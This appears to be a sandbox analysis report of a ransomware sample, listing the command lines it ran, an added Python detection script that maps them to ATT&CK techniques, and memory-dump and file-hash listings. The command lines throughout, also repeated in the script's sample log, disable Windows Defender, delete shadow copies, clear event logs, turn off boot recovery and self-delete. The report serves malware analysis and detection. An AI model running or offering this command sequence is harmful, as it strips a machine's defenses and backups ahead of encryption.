reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\system32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\system32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\system32\notepad.exe

notepad.exe C:\Bdfn_HOW_TO_DECRYPT.txt

C:\Windows\system32\cmd.exe

cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\d7f237b31f1e2526d93a91534e69f4785a31b855fc28682e5ab7fd778f621a9f.bin.sample.exe"

C:\Windows\system32\PING.EXE

ping.exe -n 5 127.0.0.1
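The Processes list above is the complete pre-encryption sequence on one host: stop and disable backup-related services, neuter Defender through policy keys, service Start values, scheduled tasks, MpCmdRun and Set-MpPreference, switch off the Defender ETW autologgers, delete shadow copies, clear the event logs, disable recovery, open the note, and self-delete behind a ping delay. The block below is an added example written for this page, not part of the sandbox report. It runs a small regex rule set over a constructed process-creation log built from the command lines above (sample path abbreviated, three benign lines added to show they do not match); the rule patterns, the ATT&CK mapping, the T1486 tag for the ransom note and the three-technique verdict threshold are the editor's assumptions, not the sandbox's signatures:

```python
"""Command-line detection for the defense-evasion sequence in this report.
Constructed sample log: command lines copied from the Processes list above
(sample.exe path abbreviated) plus three benign lines. Rule patterns, ATT&CK
mapping and the verdict threshold are the editor's assumptions."""
import re
from collections import defaultdict

SAMPLE_LOG = r"""
net.exe stop "VSS" /y
C:\Windows\system32\net1 stop "VSS" /y
net.exe stop "wbengine" /y
sc.exe config "VSS" start= disabled
sc.exe config "SDRSVC" start= disabled
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
vssadmin.exe delete shadows /all /quiet
wmic.exe shadowcopy delete
bcdedit.exe /set {default} recoveryenabled no
wevtutil.exe cl security
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
powershell Set-MpPreference -DisableRealtimeMonitoring $true
notepad.exe C:\Bdfn_HOW_TO_DECRYPT.txt
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\sample.exe"
ping.exe -n 5 127.0.0.1
sc.exe query "VSS"
net.exe use \\fileserver\share
""".strip().splitlines()

# (technique id, name, pattern). One line may match several rules.
RULES = (
    ("T1489", "Service Stop",
     re.compile(r'\bnet1?(?:\.exe)?\s+stop\b'
                r'|\bsc(?:\.exe)?\s+config\b.*\bstart=\s*disabled\b', re.I)),
    ("T1562.001", "Impair Defenses: Disable or Modify Tools",
     re.compile(r'\breg(?:\.exe)?\s+(?:add|delete)\b.*(?:Windows Defender|WdBoot|WdFilter'
                r'|WdNisDrv|WdNisSvc|WinDefend|SecurityHealthService|ContextMenuHandlers\\EPP)'
                r'|\bschtasks(?:\.exe)?\s+/Change\b.*(?:Windows Defender|ExploitGuard).*/Disable\b'
                r'|MpCmdRun(?:\.exe)?"?\s+-RemoveDefinitions\b'
                r'|Set-MpPreference\s+-Disable\w+\s+\$true', re.I)),
    ("T1562.006", "Impair Defenses: Indicator Blocking (Defender ETW autologger off)",
     re.compile(r'Autologger\\Defender\w*Logger\b.*\bStart\b.*\b0\b', re.I)),
    ("T1490", "Inhibit System Recovery",
     re.compile(r'\bvssadmin(?:\.exe)?\s+delete\s+shadows\b'
                r'|\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b'
                r'|\bbcdedit(?:\.exe)?\s+/set\b.*(?:recoveryenabled\s+no'
                r'|bootstatuspolicy\s+ignoreallfailures)\b', re.I)),
    ("T1070.001", "Clear Windows Event Logs",
     re.compile(r'\bwevtutil(?:\.exe)?\s+cl\s+\w+', re.I)),
    ("T1070.004", "File Deletion (self-delete after a ping delay)",
     re.compile(r'\bping(?:\.exe)?\s+-n\s+\d+\s+127\.0\.0\.1\b.*&&\s*del\b', re.I)),
    ("T1486", "Data Encrypted for Impact (ransom note opened; heuristic)",
     re.compile(r'\bnotepad(?:\.exe)?\s+\S*HOW_TO_DECRYPT', re.I)),
)


def classify(lines):
    """Map each technique id to the command lines that triggered it."""
    hits = defaultdict(list)
    for line in lines:
        line = line.strip()
        for tid, _name, rx in RULES:
            if line and rx.search(line):
                hits[tid].append(line)
    return dict(hits)


def targeted_services(lines):
    """Sorted service names the sequence stops (net stop) or disables (sc config)."""
    name = re.compile(r'\b(?:stop|config)\s+"([^"]+)"', re.I)
    found = set()
    for line in lines:
        if RULES[0][2].search(line):
            m = name.search(line)
            if m:
                found.add(m.group(1))
    return sorted(found)


def verdict(hits, threshold=3):
    """Assumed rule: three or more distinct techniques in one detonation is
    treated as a ransomware pre-encryption sequence rather than admin noise."""
    if len(hits) >= threshold:
        return "ransomware pre-encryption sequence"
    return "suspicious" if hits else "clean"


if __name__ == "__main__":
    hits = classify(SAMPLE_LOG)
    for tid, name, _ in RULES:
        if tid in hits:
            print(f"{tid} {name}: {len(hits[tid])} line(s)")
    print("services targeted:", targeted_services(SAMPLE_LOG))
    print("verdict:", verdict(hits))
```

Feeding real Sysmon Event ID 1 or Security 4688 command lines in place of SAMPLE_LOG is the only change needed; the standalone `ping.exe -n 5 127.0.0.1` and `sc.exe query` lines stay unmatched on purpose, since a ping or a service query on its own is routine and only the `&& del` tail or the `start= disabled` argument makes the line worth alerting on.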

Network

N/A

Files

memory/468-54-0x0000000000000000-mapping.dmp

memory/1036-55-0x0000000000000000-mapping.dmp

memory/564-56-0x0000000000000000-mapping.dmp

memory/1616-57-0x0000000000000000-mapping.dmp

memory/1860-58-0x0000000000000000-mapping.dmp

memory/812-59-0x0000000000000000-mapping.dmp

memory/624-60-0x0000000000000000-mapping.dmp

memory/1004-61-0x0000000000000000-mapping.dmp

memory/1168-62-0x0000000000000000-mapping.dmp

memory/1320-63-0x0000000000000000-mapping.dmp

memory/1640-64-0x0000000000000000-mapping.dmp

memory/1632-65-0x0000000000000000-mapping.dmp

memory/1460-66-0x0000000000000000-mapping.dmp

memory/1392-67-0x0000000000000000-mapping.dmp

memory/1896-68-0x0000000000000000-mapping.dmp

memory/1284-69-0x0000000000000000-mapping.dmp

memory/1288-70-0x0000000000000000-mapping.dmp

memory/1756-71-0x0000000000000000-mapping.dmp

memory/1948-72-0x0000000000000000-mapping.dmp

memory/1244-73-0x0000000000000000-mapping.dmp

memory/1008-74-0x0000000000000000-mapping.dmp

memory/892-75-0x0000000000000000-mapping.dmp

memory/1924-76-0x0000000000000000-mapping.dmp

memory/1608-77-0x0000000000000000-mapping.dmp

memory/428-78-0x0000000000000000-mapping.dmp

memory/572-79-0x0000000000000000-mapping.dmp

memory/1520-80-0x0000000000000000-mapping.dmp

memory/1864-81-0x0000000000000000-mapping.dmp

memory/1304-82-0x0000000000000000-mapping.dmp

memory/1928-83-0x0000000000000000-mapping.dmp

memory/1524-84-0x0000000000000000-mapping.dmp

memory/1512-85-0x0000000000000000-mapping.dmp

memory/1676-86-0x0000000000000000-mapping.dmp

memory/1068-87-0x0000000000000000-mapping.dmp

memory/1748-88-0x0000000000000000-mapping.dmp

memory/980-89-0x0000000000000000-mapping.dmp

memory/1044-90-0x0000000000000000-mapping.dmp

memory/1564-91-0x0000000000000000-mapping.dmp

memory/940-92-0x0000000000000000-mapping.dmp

memory/1712-93-0x0000000000000000-mapping.dmp

memory/720-94-0x0000000000000000-mapping.dmp

memory/1828-95-0x0000000000000000-mapping.dmp

memory/1772-96-0x0000000000000000-mapping.dmp

memory/660-97-0x0000000000000000-mapping.dmp

memory/1388-98-0x0000000000000000-mapping.dmp

memory/1740-99-0x0000000000000000-mapping.dmp

memory/1656-100-0x0000000000000000-mapping.dmp

memory/1560-101-0x0000000000000000-mapping.dmp

memory/1628-102-0x0000000000000000-mapping.dmp

memory/1336-103-0x0000000000000000-mapping.dmp

memory/1060-104-0x0000000000000000-mapping.dmp

memory/336-105-0x0000000000000000-mapping.dmp

memory/1508-106-0x0000000000000000-mapping.dmp

memory/1284-107-0x0000000000000000-mapping.dmp

memory/1536-108-0x0000000000000000-mapping.dmp

memory/2028-109-0x0000000000000000-mapping.dmp

memory/544-110-0x0000000000000000-mapping.dmp

memory/1824-111-0x0000000000000000-mapping.dmp

memory/1940-112-0x0000000000000000-mapping.dmp

memory/1940-113-0x000007FEFBC11000-0x000007FEFBC13000-memory.dmp

memory/1276-114-0x0000000000000000-mapping.dmp

memory/1528-116-0x0000000000000000-mapping.dmp

memory/1272-118-0x0000000000000000-mapping.dmp

memory/884-119-0x0000000000000000-mapping.dmp

memory/592-120-0x0000000000000000-mapping.dmp

memory/2088-123-0x0000000002850000-0x0000000002852000-memory.dmp

memory/2088-124-0x0000000002852000-0x0000000002854000-memory.dmp

memory/2088-125-0x0000000002854000-0x0000000002857000-memory.dmp

memory/2088-122-0x000007FEF2FB0000-0x000007FEF3B0D000-memory.dmp

memory/2088-126-0x000000001B790000-0x000000001BA8F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 04eeccf0e131af62b6301f5b0b0ff47a
SHA1 ba763c47a01a24e326fc2dc49d5ae8e8d294c9fe
SHA256 72af9f971933498fc59abaf6e92d02d85bbb6d58333c645bc0ec5da65ccb375e
SHA512 241a76e6985d1de36c585591afaade412d810799345ed872a211bc7552a37a3473f6a473725ba63510aedb9c710eb13a0216da7920b05c773f6e40ed755133cd

memory/2176-129-0x000007FEF2610000-0x000007FEF316D000-memory.dmp

memory/2088-130-0x000000000285B000-0x000000000287A000-memory.dmp

memory/2176-131-0x0000000002570000-0x0000000002572000-memory.dmp

memory/2176-132-0x0000000002572000-0x0000000002574000-memory.dmp

memory/2176-133-0x0000000002574000-0x0000000002577000-memory.dmp

memory/2176-134-0x000000000257B000-0x000000000259A000-memory.dmp

C:\Bdfn_HOW_TO_DECRYPT.txt

MD5 9462dca09abeb3961f88cfb6b2d54ca7
SHA1 ab4d8445f852cb514e73f611be5c9f30d28861ca
SHA256 ed6fed4612fa79435fdb285e29629d3d053ad77d2c0727d7aa1b2453a6a9c3fa
SHA512 7ab3f07b129f181d7738a068eb3657cb395863689bffe6c98ea9647948a67f82c44ad66c1907b9cfc8e623edfe8a1a5b149624e2913f6d56dead5bb56235cab4